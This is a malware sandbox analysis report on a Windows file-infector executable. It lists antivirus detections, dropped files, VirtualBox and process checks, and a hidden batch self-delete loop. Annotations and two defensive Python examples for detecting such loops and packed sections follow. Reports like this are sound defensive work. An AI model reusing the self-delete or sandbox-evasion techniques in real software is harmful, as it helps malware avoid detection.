Score: 7.4
Risk level: High

SHA256: 768ce82fc08a1e6da63bdf72dea66916992856b85bdf1eed47fb3a1a8609cd9d

File name: 17ac17b700ad398d8db0dd61b11aff61.exe

Analysis duration: 80s

Last analysis:

File size: 1.7MB
Verdict flags: static scan flagged malicious; dynamic analysis flagged malicious.
Detection-name tags: AI SCORE=87, ALI2000007, BANLOAD, CLASSIC, CONFIDENCE, CSTQAJ, DARKSHELL, DUMPMODULEINFECTIOUSNME, FAMVT, FILEINFECTOR, HIGH, HIGH CONFIDENCE, INFECTPE, JADTRE, KA@558NXG, KUDJ, LOADER, M1R5, MALICIOUS, PE, MIKCER, NIMNUL, OTWYCAL, PATCHLOAD, PATE, PCARRIER, RAMNIT, ROUE, SCORE, SMALL, UNSAFE, VJADTRE, WALI, WAPOMI (list truncated on the page)
Hawkeye engine
Not detected: no Hawkeye engine result is available yet.
Static verdict
Antivirus engines
Engine        Result                             Scan date  Engine version
Alibaba       virus:Win32/InfectPE.ali2000007    20190527   0.3.0.5
Baidu         Win32.Virus.Otwycal.d              20190318   1.0.0.2
Tencent       Virus.Win32.Loader.aab             20200422   1.0.0.1
Kingsoft      (no result recorded)               20200422   2013.8.14.323
McAfee        W32/Kudj                           20200422   6.0.6.653
Avast         Win32:Malware-gen                  20200422   18.4.3895.0
CrowdStrike   win/malicious_confidence_90% (W)   20190702   1.0
Static indicators
Command line console output was observed (50 of 542 events)
Time  API  Arguments  Status  Return  Repeated
1620137873.707  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137873.707  WriteConsoleW  buffer: del  console_handle: 0x00000007  success  1  0
1620137873.707  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137873.878  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe  console_handle: 0x00000007  success  1  0
1620137873.941  WriteConsoleW  buffer: Access denied.  console_handle: 0x0000000b  success  1  0
1620137873.972  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137873.972  WriteConsoleW  buffer: if  console_handle: 0x00000007  success  1  0
1620137873.972  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137873.972  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success  1  0
1620137873.988  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success  1  0
1620137874.003  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137874.003  WriteConsoleW  buffer: del  console_handle: 0x00000007  success  1  0
1620137874.003  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137874.066  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe  console_handle: 0x00000007  success  1  0
1620137874.066  WriteConsoleW  buffer: Access denied.  console_handle: 0x0000000b  success  1  0
1620137874.082  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137874.082  WriteConsoleW  buffer: if  console_handle: 0x00000007  success  1  0
1620137874.082  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137874.082  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success  1  0
1620137874.082  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success  1  0
1620137874.097  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137874.097  WriteConsoleW  buffer: del  console_handle: 0x00000007  success  1  0
1620137874.097  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137874.128  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe  console_handle: 0x00000007  success  1  0
1620137874.128  WriteConsoleW  buffer: Access denied.  console_handle: 0x0000000b  success  1  0
1620137874.16  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137874.175  WriteConsoleW  buffer: if  console_handle: 0x00000007  success  1  0
1620137874.175  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137874.175  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success  1  0
1620137874.191  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success  1  0
1620137874.253  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137874.269  WriteConsoleW  buffer: del  console_handle: 0x00000007  success  1  0
1620137874.269  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137874.363  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe  console_handle: 0x00000007  success  1  0
1620137874.363  WriteConsoleW  buffer: Access denied.  console_handle: 0x0000000b  success  1  0
1620137874.394  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137874.41  WriteConsoleW  buffer: if  console_handle: 0x00000007  success  1  0
1620137874.41  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137874.41  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success  1  0
1620137874.425  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success  1  0
1620137874.425  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137874.425  WriteConsoleW  buffer: del  console_handle: 0x00000007  success  1  0
1620137874.425  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137874.457  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe  console_handle: 0x00000007  success  1  0
1620137874.457  WriteConsoleW  buffer: Access denied.  console_handle: 0x0000000b  success  1  0
1620137874.488  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success  1  0
1620137874.488  WriteConsoleW  buffer: if  console_handle: 0x00000007  success  1  0
1620137874.488  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"  console_handle: 0x00000007  success  1  0
1620137874.488  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success  1  0
1620137874.519  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success  1  0
Note: these 50 events are five passes through a cmd.exe self-delete loop: del "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe", then if exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe" goto :DELFILE. The stderr writes (console_handle 0x0000000b; the report shows the localized message 拒绝访问。, translated above as "Access denied.") are del failing, which is what cmd reports while the target executable is still running or otherwise locked, so the loop spins until the file can be removed. Together with the hidden-window ShellExecuteExW of 618f1f16.bat listed under the dynamic indicators (about 0.6 s before the first prompt here), this is consistent with that batch file being the script producing the output; the report does not show the script's contents directly.
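The loop above can be recovered mechanically from the WriteConsoleW rows. The following Python is an added example, not part of the sandbox report or its signature set: it joins the stdout buffers in event order, matches the del / if exist / goto idiom with a backreference so that only a loop re-testing the same path counts, and tallies stderr writes as failed attempts. The event tuples are constructed to mirror one pass of the table (stderr text translated); the console-handle values and the regular expression are assumptions made for this example, not something the report states.

```python
import re

STDOUT, STDERR = "0x00000007", "0x0000000b"  # console handles as they appear in the report

# Constructed sample: one pass of the loop as (timestamp, api, buffer, console_handle),
# copied in shape from the report's WriteConsoleW rows; the stderr text is the
# translated "Access denied." rather than the localized original.
SAMPLE_EVENTS = [
    ("1620137873.707", "WriteConsoleW", r"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>", STDOUT),
    ("1620137873.707", "WriteConsoleW", "del", STDOUT),
    ("1620137873.707", "WriteConsoleW", r'"C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"', STDOUT),
    ("1620137873.878", "WriteConsoleW", r"C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe", STDOUT),
    ("1620137873.941", "WriteConsoleW", "Access denied.", STDERR),
    ("1620137873.972", "WriteConsoleW", r"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>", STDOUT),
    ("1620137873.972", "WriteConsoleW", "if", STDOUT),
    ("1620137873.972", "WriteConsoleW", r'exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"', STDOUT),
    ("1620137873.972", "WriteConsoleW", "goto", STDOUT),
    ("1620137873.988", "WriteConsoleW", ":DELFILE", STDOUT),
]

# del "<path>" ... if exist "<same path>" goto <label>: the cmd.exe idiom a dropper
# uses to delete its own executable once the process holding it exits.  The
# backreference (?P=path) ensures the retest refers to the file just deleted.
SELF_DELETE_RE = re.compile(
    r'\bdel\s+"?(?P<path>[^"\s]+)"?\s.*?'
    r'\bif\s+exist\s+"?(?P=path)"?\s+goto\s+(?P<label>:?\w+)',
    re.IGNORECASE | re.DOTALL,
)


def console_text(events, handle):
    """Join the buffers written to one console handle, in event order."""
    return " ".join(buf for _, api, buf, h in events
                    if api == "WriteConsoleW" and h == handle)


def find_self_delete_loops(events):
    """Scan reconstructed stdout for del / if exist / goto loops and count stderr failures."""
    stdout = console_text(events, STDOUT)
    stderr_writes = sum(1 for _, api, _buf, h in events
                        if api == "WriteConsoleW" and h == STDERR)
    matches = list(SELF_DELETE_RE.finditer(stdout))
    return {
        "iterations": len(matches),                       # one per del/if-exist/goto pass
        "targets": sorted({m.group("path") for m in matches}),
        "labels": sorted({m.group("label") for m in matches}),
        "stderr_writes": stderr_writes,                   # failed del attempts (any locale)
        "verdict": "self-delete loop" if matches else "no loop detected",
    }


if __name__ == "__main__":
    # Replaying the constructed pass five times reproduces the report's 50 events.
    print(find_self_delete_loops(SAMPLE_EVENTS * 5))
```

Counting stderr writes rather than matching the text keeps the check independent of the sandbox's display language, which matters here because the guest was running a Chinese locale.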
This executable has a PDB path (1 event)
pdb_path C:\Users\fuqikang\Documents\Visual Studio 2008\Projects\ResetPCDNClient\Release\百金助手.pdb
Tries to locate where the browsers are installed (1 event)
file C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)
section bNa\xf8\xa3uc
Note: the section name is seven raw bytes (62 4E 61 F8 A3 75 63), two of them outside printable ASCII, which is why the report shows it escaped; the same section is the one flagged for high entropy under the dynamic indicators. The PDB path retains the build machine's user name and the project name (ResetPCDNClient), both usable as pivots.
Behavioral verdict
Dynamic indicators
Foreign language identified in PE resource (50 of 69 events)
The 50 listed entries repeat the same offset and size within each resource type, so they are collapsed here by type:
Type       Entries  Language      Sublanguage                 Offset      Size        libmagic filetype
RT_CURSOR  16       LANG_CHINESE  SUBLANG_CHINESE_SIMPLIFIED  0x00182f94  0x00000134  data
RT_BITMAP  2        LANG_CHINESE  SUBLANG_CHINESE_SIMPLIFIED  0x00183180  0x00000144  data
RT_ICON    15       LANG_CHINESE  SUBLANG_CHINESE_SIMPLIFIED  0x00193bd8  0x000002e8  dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888
RT_DIALOG  4        LANG_CHINESE  SUBLANG_CHINESE_SIMPLIFIED  0x0019439c  0x00000034  data
RT_STRING  13       LANG_CHINESE  SUBLANG_CHINESE_SIMPLIFIED  0x00194d68  0x00000030  data
Note: "foreign" only means a resource language other than English/neutral was found; Simplified Chinese resources match the Chinese PDB file name and are not suspicious on their own. The dBase IV filetype on the icon entries is libmagic guessing from the leading bytes of icon pixel data, not an embedded database.
Creates executable files on the filesystem (20 events)
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\618f1f16.bat
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5D140FD5.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\0FB16CC6.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\70071042.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\4BCB6AA0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3FAC0968.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\hsguUaA.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
Note: only the seven files under the user's Temp directory (one .bat and six .exe with hex-style names) are new drops. The C:\Python27 entries and C:\tmpsij43m\bin\inject-x86.exe, is32bit.exe and execsc.exe are the sandbox's own analysis agent (its Python install and analyzer helper binaries), which already existed in the guest. The signature fires on any write to an .exe, so writes to pre-existing executables are consistent with the PE file-infector verdicts (Nimnul/Wapomi/Jadtre) in the VirusTotal list below, but the report does not show whether these files were created or modified.
Drops a binary and executes it (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\618f1f16.bat
Drops an executable to the user AppData folder (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\hsguUaA.exe
A process created a hidden window (1 event)
Time  API  Arguments  Status  Return  Repeated
1620137873.065625  ShellExecuteExW  filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\618f1f16.bat  filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\618f1f16.bat  show_type: 0  success  1  0
Note: show_type 0 is SW_HIDE, so the batch file ran without a visible console window; the del / if exist loop in the console-output section begins about 0.6 s after this call.
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (2 events)
(no event details are given in the report; the import table below does include OpenProcess, Process32FirstW, Process32NextW and TerminateProcess)
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time  API  Arguments  Status  Return  Repeated
1620137865.565625  GetAdaptersAddresses  flags: 0  family: 0  failed  111  0
Note: return 111 is ERROR_BUFFER_OVERFLOW, the expected result of the first call made with an undersized buffer to learn the required size. The report shows no follow-up call, so it does not establish that the adapter list was actually read.
The binary likely contains encrypted or compressed data indicative of a packer (1 event)
entropy 6.9348295736948  section name: bNa\xf8\xa3uc  virtual_address: 0x001b9000  virtual_size: 0x00005000  size_of_data: 0x00004200  description: A section with a high entropy has been found
Note: this is the same non-printable section name flagged under the static indicators. Entropy of 6.93 bits per byte over 0x4200 bytes of raw data, in a section whose name is not a conventional linker name, is consistent with compressed or encrypted content (plain x86 code typically sits well below 6.5; uniformly random data reaches 8.0).
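The "unknown PE section names" indicator in the static section and the high-entropy indicator here rest on the same two checks: is the section name printable and conventional, and how close to 8 bits per byte is its raw data. The following Python is an added example rather than the sandbox's own code: it walks the section table of a PE image by hand (no pefile dependency), computes Shannon entropy per section, and applies both heuristics. The image it audits is constructed inside the block (empty optional header, a low-entropy .text section, and a section carrying the report's seven raw name bytes filled with pseudo-random data standing in for a packed payload); the 6.8 threshold and the list of conventional section names are assumptions for this example.

```python
import math
import random
import struct

ENTROPY_THRESHOLD = 6.8  # assumption: roughly where "packed section" heuristics start firing
KNOWN_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                       ".edata", ".tls", ".bss", ".pdata", ".CRT", ".textbss"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes):
    """Walk the IMAGE_SECTION_HEADER table of a PE image.

    Yields (raw_name, virtual_size, virtual_address, size_of_raw_data, pointer_to_raw_data).
    """
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    file_header = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    num_sections, size_of_optional = file_header[1], file_header[5]
    offset = e_lfanew + 4 + 20 + size_of_optional  # section table follows the optional header
    for _ in range(num_sections):
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", image, offset)
        yield name.rstrip(b"\0"), vsize, vaddr, rsize, rptr
        offset += 40  # sizeof(IMAGE_SECTION_HEADER)


def audit_sections(image: bytes):
    """One finding per section: entropy plus the two packer heuristics used by the report."""
    findings = []
    for raw_name, vsize, vaddr, rsize, rptr in parse_sections(image):
        data = image[rptr:rptr + rsize]
        name = raw_name.decode("latin-1")          # keeps non-ASCII bytes visible, as the report does
        printable = all(0x20 < b < 0x7F for b in raw_name)
        entropy = shannon_entropy(data)
        findings.append({
            "name": name,
            "virtual_address": vaddr,
            "virtual_size": vsize,
            "size_of_data": rsize,
            "entropy": round(entropy, 4),
            "unknown_name": not printable or name not in KNOWN_SECTION_NAMES,
            "high_entropy": entropy >= ENTROPY_THRESHOLD,
        })
    return findings


def build_pe_image(sections):
    """Construct a minimal PE for testing: DOS stub, PE signature, file header with an
    empty optional header, the section table, and 512-byte-aligned raw data."""
    e_lfanew = 0x40
    raw_base = (e_lfanew + 4 + 20 + 40 * len(sections) + 0x1FF) & ~0x1FF
    dos = bytearray(b"MZ").ljust(e_lfanew, b"\0")
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    file_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table, body, vaddr = b"", b"", 0x1000
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name[:8].ljust(8, b"\0"), len(data), vaddr,
                             len(data), raw_base + len(body), 0, 0, 0, 0, 0x60000020)
        body += data
        vaddr += (len(data) + 0xFFF) & ~0xFFF
    return (bytes(dos) + b"PE\0\0" + file_header + table).ljust(raw_base, b"\0") + body


_rng = random.Random(2021)  # fixed seed so the constructed image is reproducible
CONSTRUCTED_IMAGE = build_pe_image([
    # Code-like bytes: a short prologue repeated, then int3 padding (low entropy).
    (b".text", b"\x55\x8b\xec\x83\xec\x10" * 200 + b"\xcc" * 100),
    # The report's odd seven-byte section name with 0x4200 bytes of pseudo-random
    # data standing in for a packed payload (high entropy).
    (b"bNa\xf8\xa3uc", bytes(_rng.getrandbits(8) for _ in range(0x4200))),
])

if __name__ == "__main__":
    for finding in audit_sections(CONSTRUCTED_IMAGE):
        print(finding)
```

On the real sample the second finding would show virtual_address 0x001b9000 and size_of_data 0x00004200 as in the report; the constructed image uses its own layout, so only the name and the two heuristic flags are comparable.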
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)
Time  API  Arguments  Status  Return  Repeated
1620119622.923198  LookupPrivilegeValueW  system_name: (empty)  privilege_name: SeDebugPrivilege  success  1  0
Note: LookupPrivilegeValueW only resolves the LUID; actually enabling SeDebugPrivilege requires AdjustTokenPrivileges, which is not among the named imports listed below (OpenProcessToken is). This event's timestamp is also about five hours earlier than every other event in the report.
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Note: 172.217.0.0/16 is Google-allocated address space. The report records no port, protocol or payload for this connection, so on this evidence it cannot be told apart from a connectivity check.
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 events)
All regkeys below are under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ (written as WPAD\ for brevity); every call returned success 0 0.
Time  API  key_handle  regkey  reg_type  value
1620137868.127625  RegSetValueExA  0x00000394  WPAD\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason  4 (REG_DWORD)  1
1620137868.127625  RegSetValueExA  0x00000394  WPAD\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime  3 (REG_BINARY)  FILETIME (shown as ŽŸ³Ü@× in the report)
1620137868.127625  RegSetValueExA  0x00000394  WPAD\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision  4 (REG_DWORD)  3
1620137868.127625  RegSetValueExW  0x00000394  WPAD\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName  1 (REG_SZ)  网络 2 ("Network 2", the localized default network name)
1620137868.127625  RegSetValueExA  0x000003fc  WPAD\0a-00-27-00-00-00\WpadDecisionReason  4 (REG_DWORD)  1
1620137868.127625  RegSetValueExA  0x000003fc  WPAD\0a-00-27-00-00-00\WpadDecisionTime  3 (REG_BINARY)  FILETIME (shown as ŽŸ³Ü@× in the report)
1620137868.127625  RegSetValueExA  0x000003fc  WPAD\0a-00-27-00-00-00\WpadDecision  4 (REG_DWORD)  3
1620137868.159625  RegSetValueExW  0x00000398  WPAD\WpadLastNetwork  1 (REG_SZ)  {40112ABE-63B3-43C3-BE93-1440EE3AF106}
1620137868.893625  RegSetValueExA  0x00000410  WPAD\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason  4 (REG_DWORD)  1
1620137868.893625  RegSetValueExA  0x00000410  WPAD\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime  3 (REG_BINARY)  FILETIME (shown as ÐH´Ü@× in the report)
1620137868.893625  RegSetValueExA  0x00000410  WPAD\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision  4 (REG_DWORD)  0
1620137868.893625  RegSetValueExW  0x00000410  WPAD\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName  1 (REG_SZ)  网络 2 ("Network 2")
1620137868.893625  RegSetValueExA  0x00000414  WPAD\0a-00-27-00-00-00\WpadDecisionReason  4 (REG_DWORD)  1
1620137868.893625  RegSetValueExA  0x00000414  WPAD\0a-00-27-00-00-00\WpadDecisionTime  3 (REG_BINARY)  FILETIME (shown as ÐH´Ü@× in the report)
1620137868.893625  RegSetValueExA  0x00000414  WPAD\0a-00-27-00-00-00\WpadDecision  4 (REG_DWORD)  0
Note: despite the signature title, nothing here sets a PAC URL or a proxy. WpadDecision, WpadDecisionReason, WpadDecisionTime (an 8-byte FILETIME, rendered as mojibake in the report), WpadNetworkName and WpadLastNetwork form the per-network cache that WinHTTP's proxy auto-detection writes whenever a process triggers WPAD discovery, so the signature fires for any WinHTTP/WinINet client and is a known false-positive source. The two network subkeys are a GUID and 0a-00-27-00-00-00; the latter is the MAC address VirtualBox uses for its host-only adapter, which is itself a sandbox fingerprint a sample could read.
Detects VirtualBox through the presence of a file (5 events)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
Note: these are VirtualBox Guest Additions paths the sample probed; the report lists the checks, not whether they succeeded or what the sample did with the answer.
File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 of 63 events)
Most named detections agree on a Win32 PE file-infector family (Nimnul/Ramnit, Wapomi, Jadtre/VJadtre, InfectPE, PatchLoad naming); the remainder are generic or machine-learning verdicts.
Engine  Result
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
MicroWorld-eScan Win32.VJadtre.3
FireEye Generic.mg.17ac17b700ad398d
ALYac Win32.VJadtre.3
Cylance Unsafe
Zillya Virus.Nimnul.Win32.5
K7AntiVirus Virus ( 0040f7441 )
Alibaba virus:Win32/InfectPE.ali2000007
K7GW Virus ( 0040f7441 )
Cybereason malicious.700ad3
Arcabit Win32.VJadtre.3
TrendMicro PE_WAPOMI.BM
Baidu Win32.Virus.Otwycal.d
F-Prot W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
APEX Malicious
Paloalto generic.ml
ClamAV Win.Trojan.Downloader-64720
Kaspersky Virus.Win32.Nimnul.f
BitDefender Win32.VJadtre.3
NANO-Antivirus Trojan.Win32.Banload.cstqaj
AegisLab Virus.Win32.Nimnul.m1R5
Tencent Virus.Win32.Loader.aab
Ad-Aware Win32.VJadtre.3
Sophos W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
VIPRE Virus.Win32.Small.acea (v)
McAfee-GW-Edition BehavesLike.Win32.Pate.th
Trapmine malicious.high.ml.score
Emsisoft Win32.VJadtre.3 (B)
SentinelOne DFI - Malicious PE
Cyren W32/PatchLoad.E
Jiangmin Win32/Nimnul.f
Avira W32/Jadtre.B
MAX malware (ai score=87)
Antiy-AVL Virus/Win32.Nimnul.f
Microsoft Virus:Win32/Mikcer.B
Endgame malicious (high confidence)
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
AhnLab-V3 Win32/VJadtre.Gen
Acronis suspicious
McAfee W32/Kudj
TACHYON Virus/W32.Ramnit.C
VBA32 Virus.Nimnul.19209
Malwarebytes Virus.Agent
Visual analysis
Binary image
None: no binary visualization image was generated for this sample.
Run screenshots
None: no screenshots were captured while the sample ran.


PE compile time: 2018-06-27 10:37:37

Imports

Note: libraries listed without entries (PSAPI.DLL, COMCTL32.dll) and the gaps in the IAT addresses below (for example 0x52e1f8 to 0x52e208) are entries the report did not resolve to a name, most likely imports by ordinal, so this table is not the complete import set. The KERNEL32 entries that matter for the behavior above are OpenProcess, Process32FirstW/Process32NextW, TerminateProcess, CreateProcessW and WriteConsoleW.

Library PSAPI.DLL:
(no named imports listed)
Library KERNEL32.dll:
0x52e1e8 GetLocaleInfoA
0x52e1ec WriteConsoleA
0x52e1f0 GetConsoleOutputCP
0x52e1f4 WriteConsoleW
0x52e1f8 GetProcessHeap
0x52e208 SizeofResource
0x52e20c LockResource
0x52e210 LoadResource
0x52e214 FindResourceW
0x52e218 GetCurrentProcess
0x52e21c GetLastError
0x52e220 CloseHandle
0x52e224 OpenProcess
0x52e228 GetProcessTimes
0x52e22c TerminateProcess
0x52e234 Process32FirstW
0x52e238 Process32NextW
0x52e23c CreateProcessW
0x52e240 GetStringTypeA
0x52e244 GetProcAddress
0x52e248 GetModuleHandleW
0x52e24c FreeLibrary
0x52e250 GlobalAlloc
0x52e254 lstrcmpW
0x52e258 GlobalLock
0x52e25c InterlockedExchange
0x52e260 WideCharToMultiByte
0x52e264 MultiByteToWideChar
0x52e268 CompareStringA
0x52e26c LoadLibraryW
0x52e270 GetLocaleInfoW
0x52e274 lstrcmpA
0x52e278 GetModuleFileNameW
0x52e280 GetCurrentThreadId
0x52e284 GetCurrentThread
0x52e288 GlobalDeleteAtom
0x52e28c GlobalFree
0x52e290 FreeResource
0x52e29c lstrlenW
0x52e2a0 CreateProcessA
0x52e2a4 GetExitCodeProcess
0x52e2a8 CreateFileA
0x52e2ac GetConsoleMode
0x52e2b0 GetConsoleCP
0x52e2b4 LCMapStringA
0x52e2bc LCMapStringW
0x52e2c0 IsValidCodePage
0x52e2c4 GetOEMCP
0x52e2c8 GetACP
0x52e2cc GetCPInfo
0x52e2d0 GetFileAttributesA
0x52e2d8 IsDebuggerPresent
0x52e2e4 VirtualFree
0x52e2e8 HeapCreate
0x52e2ec GetStartupInfoA
0x52e2f0 SetHandleCount
0x52e2f4 GetCommandLineW
0x52e300 GetModuleFileNameA
0x52e304 GetStdHandle
0x52e30c GlobalUnlock
0x52e314 GetStringTypeW
0x52e318 GetFileType
0x52e31c SetStdHandle
0x52e320 SetThreadPriority
0x52e324 ResumeThread
0x52e328 WaitForSingleObject
0x52e32c VirtualQuery
0x52e330 GetSystemInfo
0x52e334 VirtualAlloc
0x52e338 HeapSize
0x52e33c HeapReAlloc
0x52e340 RaiseException
0x52e344 CreateThread
0x52e348 ExitThread
0x52e34c ExitProcess
0x52e350 RtlUnwind
0x52e354 HeapFree
0x52e358 HeapAlloc
0x52e360 GetStartupInfoW
0x52e364 FindResourceExW
0x52e368 VirtualProtect
0x52e36c GetFileTime
0x52e370 GetFileSizeEx
0x52e378 Sleep
0x52e37c GetProfileIntW
0x52e380 GetTickCount
0x52e384 SearchPathW
0x52e388 GetTempPathW
0x52e38c GetTempFileNameW
0x52e390 SetErrorMode
0x52e398 GlobalGetAtomNameW
0x52e39c GetFullPathNameW
0x52e3a4 FindFirstFileW
